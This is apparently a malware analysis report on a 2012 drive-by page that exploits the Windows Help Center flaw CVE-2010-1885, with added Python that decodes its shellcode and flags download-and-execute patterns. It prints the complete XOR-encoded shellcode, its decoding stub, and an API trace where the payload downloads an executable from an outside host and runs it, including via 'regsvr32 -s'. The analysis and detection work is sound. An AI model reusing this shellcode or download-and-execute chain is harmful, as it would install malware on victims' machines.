Analysis report for http://www.acmister.com/web.html

Sample Overview

URL http://www.acmister.com/web.html
Domain www.acmister.com
Analysis Started 2012-07-20 13:56:49
Report Generated 2012-07-20 13:57:12
Jsand version 2.3.3

See the report for domain www.acmister.com.

Detection results

Detector Result
Jsand 2.3.3 malicious

In particular, the following URL was found to contain malicious content:

Exploits

Name      Description                               Reference
HPC URL   Help Center URL Validation Vulnerability  CVE-2010-1885

CVE-2010-1885 is the Windows Help and Support Center (hcp:// protocol handler) URL validation flaw fixed by MS10-042; the page exploits the visiting client, which is why the shellcode below runs on the victim and not on the web server.

Deobfuscation results

Evals

Writes

Network Activity

Requests

URL                               Status  Content Type
http://www.acmister.com/web.html  200     text/html

Redirects

No redirects.

ActiveX controls

Shellcode

Hexadecimal                                       ASCII
41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81  AAAAf......X1.f.
e9 50 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff  .P..0(@.........
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3  ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04  X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3  ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3  .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4  \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b  .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3  .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3  $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b  +..vq..{..@..U$.
5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7  \+....@...B-q...
d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28  .....((((pxBh@.(
28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d  ((x..1x}...v8..-
d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab  ..@GF((@]ZDE|.>.
ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c  .....I....*.Z..,
29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c  )((.t.$.,.ZMO[.l
0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40  .,^Z...l....[.{@
d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28  .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21  _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28  (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e  {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3  ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42  ;o..(].o..(].B(B
d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2  ..~.......f&....
26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07  &.G)....s3.nQ.2.
58 40 5c 5c 58 12 07 07  5c 5a 49 44 49 44 49 44  X@\\X...\ZIDIDID
49 44 49 19 1a 1b 06 4b  47 06 4b 4b 07 5f 06 58  IDI....KG.KK._.X
40 58 17 4e 15 4b 1d 10  1a 1e 0e 4d 15 19 28 28  @X.N.K.....M..((

This shellcode was found on http://tralalalala123.co.cc/main.php?page=4f7377f400e2e2b1.
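The dump above opens with a short self-decoding loop, and everything after it is XOR-encoded. The following Python is an added example, not part of the Wepawet report, that carves that stub, reads the XOR key and byte count out of its own instructions, and decodes the remainder. The hex is copied from the table above; the disassembly in the comments is a by-hand reading of those bytes.

```python
import re

# Hex column of the "Shellcode" table in this report, copied verbatim: 29 rows of 16 bytes (464 bytes).
SHELLCODE_HEX = """
41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81
e9 50 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3
af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3
5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4
85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b
f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3
24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3
2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b
5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7
d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28
28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d
d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab
ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c
29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c
0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40
d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28
5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21
28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28
7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e
2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3
3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42
d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2
26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07
58 40 5c 5c 58 12 07 07  5c 5a 49 44 49 44 49 44
49 44 49 19 1a 1b 06 4b  47 06 4b 4b 07 5f 06 58
40 58 17 4e 15 4b 1d 10  1a 1e 0e 4d 15 19 28 28
"""

# Decoder stub at the start of the dump, disassembled by hand (offsets are into the dump):
#   0x00  41 41 41 41      inc ecx (x4, padding)
#   0x04  66 83 e4 fc      and  sp, 0xfffc
#   0x08  fc               cld
#   0x09  eb 10            jmp  short 0x1b
#   0x0b  58               pop  eax            ; eax -> 0x20, start of the encoded payload
#   0x0c  31 c9            xor  ecx, ecx
#   0x0e  66 81 e9 50 fe   sub  cx, 0xfe50     ; cx = 0x01b0 = 432 bytes to decode
#   0x13  80 30 28         xor  byte [eax], 0x28
#   0x16  40               inc  eax
#   0x17  e2 fa            loop 0x13
#   0x19  eb 05            jmp  short 0x20     ; run the decoded payload
#   0x1b  e8 eb ff ff ff   call 0x0b           ; pushes 0x20 as the return address
STUB_LEN = 0x20

def parse_hexdump(text: str) -> bytes:
    """Turn the whitespace-separated hex dump into raw bytes."""
    return bytes.fromhex("".join(text.split()))

def stub_parameters(sc: bytes):
    """Read the XOR key and byte count out of the stub itself rather than trusting the comment above."""
    if sc[0x0e:0x11] != b"\x66\x81\xe9" or sc[0x13:0x15] != b"\x80\x30":
        raise ValueError("dump does not start with the expected 'sub cx' / 'xor [eax]' stub")
    imm16 = int.from_bytes(sc[0x11:0x13], "little")  # 0xfe50
    count = (-imm16) & 0xFFFF                         # what 'sub cx, imm16' leaves in cx when cx was 0
    key = sc[0x15]                                    # imm8 of 'xor byte [eax], imm8'
    return key, count

def decode_payload(sc: bytes) -> bytes:
    """Apply the stub's single-byte XOR to exactly the bytes it would decode at run time."""
    key, count = stub_parameters(sc)
    body = sc[STUB_LEN:STUB_LEN + count]
    if len(body) != count:
        raise ValueError(f"dump holds {len(body)} payload bytes, stub expects {count}")
    return bytes(b ^ key for b in body)

def printable_strings(data: bytes, min_len: int = 6):
    """strings(1)-style extraction of printable ASCII runs."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def extract_urls(data: bytes):
    """Pull http(s) URLs out of the decoded payload."""
    return [m.group().decode("ascii") for m in re.finditer(rb"https?://[\x21-\x7e]+", data)]

if __name__ == "__main__":
    sc = parse_hexdump(SHELLCODE_HEX)
    payload = decode_payload(sc)
    print(f"decoded {len(payload)} bytes with key 0x{stub_parameters(sc)[0]:02x}")
    for s in printable_strings(payload):
        print("string:", s)
    for u in extract_urls(payload):
        print("url:", u)
```

Decoding recovers the same URL the emulator later passes to URLDownloadToFileA, which is a useful cross-check that the key and length were read correctly. Only that URL survives as one contiguous string: the dropped file name and the regsvr32 -s command line are assembled four bytes at a time through mov immediates ("wpbt", ".dll", "regs", "vr32", " -s "), so a plain strings pass over the decoded buffer does not show them, and the API trace is the place to read them.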

Shellcode Analysis

Shellcode API Trace

Offset      DLL.API Name and arguments  Return value
0x7c801ad9  kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)  1
0x7c801d7b  kernel32.LoadLibraryA(lpFileName=urlmon)  0x1a400000
0x7c835dfa  kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe  urlmon.URLDownloadToFileA(pCaller=0, szURL=http://tralalalala123.co.cc/w.php?f=c5826&e=1, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)  0
0x7c86250d  kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d  kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b  kernel32.TerminateThread(dwExitCode=0)
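The trace is a textbook download-and-execute chain: fetch a file into %TEMP%, run it, then register it as a COM server with regsvr32. The following Python is an added example, not part of the Wepawet report, that parses trace rows in this format and pairs each successful URLDownloadToFile with the later process launches that reference the dropped path. The rows are the ones above, re-typed one per line with a space between offset, call and return value; the list of process-launching APIs is an assumption about what other traces might contain, since this one only uses WinExec.

```python
import re
from dataclasses import dataclass

# Rows of the "Shellcode API Trace" table above, re-typed one per line with a space
# between offset, call and return value (constructed input for this example).
TRACE_LINES = [
    r"0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255) 1",
    r"0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon) 0x1a400000",
    r"0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])",
    r"0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://tralalalala123.co.cc/w.php?f=c5826&e=1, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0",
    r"0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)",
    r"0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)",
    r"0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)",
]

# offset, dll.api(args) and an optional return value
CALL_RE = re.compile(r"^(0x[0-9a-fA-F]+)\s+(\w+)\.(\w+)\((.*)\)\s*(\S*)$")

# Win32 APIs that start a process from a path or command line (assumed set;
# the trace above only uses WinExec).
EXEC_APIS = {"WinExec", "CreateProcessA", "CreateProcessW", "ShellExecuteA", "ShellExecuteW"}

@dataclass
class Call:
    offset: int
    dll: str
    api: str
    args: dict       # name -> value as passed in
    out_args: dict   # bracketed [name=value] entries: buffers filled in by the callee
    ret: str         # return value column, "" when the tracer did not record one

@dataclass
class Finding:
    url: str
    dropped_path: str
    command: str
    via_regsvr32: bool

def parse_call(line: str) -> Call:
    """Split one trace row into offset, DLL, API, arguments and return value."""
    m = CALL_RE.match(line.strip())
    if not m:
        raise ValueError("unparseable trace line: " + line)
    offset, dll, api, argtext, ret = m.groups()
    args, out_args = {}, {}
    for part in argtext.split(", "):
        if not part:
            continue
        target = args
        if part.startswith("[") and part.endswith("]"):
            part, target = part[1:-1], out_args
        name, _, value = part.partition("=")
        target[name] = value
    return Call(int(offset, 16), dll, api, args, out_args, ret)

def find_drop_and_execute(calls):
    """Pair each successful URLDownloadToFile with later process launches that use the dropped file."""
    dropped = {}   # lower-cased local path -> (path as written, source URL)
    findings = []
    for c in calls:
        if c.api.startswith("URLDownloadToFile") and c.ret in ("0", ""):   # 0 == S_OK
            dropped[c.args["szFileName"].lower()] = (c.args["szFileName"], c.args["szURL"])
        elif c.api in EXEC_APIS:
            for value in c.args.values():
                for path_lc, (path, url) in dropped.items():
                    if path_lc in value.lower():
                        findings.append(Finding(url, path, value,
                                                value.lower().lstrip().startswith("regsvr32")))
    return findings

def triage(lines):
    return find_drop_and_execute([parse_call(l) for l in lines])

if __name__ == "__main__":
    for f in triage(TRACE_LINES):
        how = "registered with regsvr32 -s" if f.via_regsvr32 else "launched directly"
        print(f"{f.url} -> {f.dropped_path} ({how}): {f.command}")
```

Matching on the dropped path rather than on a fixed API sequence is what keeps the rule useful: a variant that downloads to a different directory, or launches through CreateProcess instead of WinExec, still trips it, while a GetTempPath or LoadLibrary on its own does not.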

Shellcode DLLs

DLL Name
kernel32.dll
urlmon.dll

Shellcode URLs

Complete URL                                   Domain Name           IP Address
http://tralalalala123.co.cc/w.php?f=c5826&e=1  tralalalala123.co.cc

Malware

Additional (potential) malware:

URL                                            Type                                                     Hash (MD5)                        Analysis
http://tralalalala123.co.cc/w.php?f=c5826&e=1  PE32 executable for MS Windows (GUI) Intel 80386 32-bit  59a70b5b48aaf10194955b2ef92083ec